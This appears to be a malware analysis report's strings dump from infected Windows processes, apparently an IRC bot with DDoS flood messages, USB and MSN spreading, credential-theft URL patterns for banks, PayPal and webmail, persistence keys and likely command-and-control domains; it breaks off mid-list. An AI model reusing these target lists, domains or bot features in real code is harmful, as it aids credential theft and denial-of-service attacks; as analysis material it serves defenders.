%s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>imapi.exe_1264_rwx_00A70000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\imapi.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\imapi.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>spoolsv.exe_1440_rwx_00F50000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\spoolsv.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>Explorer.EXE_1912_rwx_021E0000_00027000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre><b>Explorer.EXE_1912_rwx_02208000_00072000:</b><pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 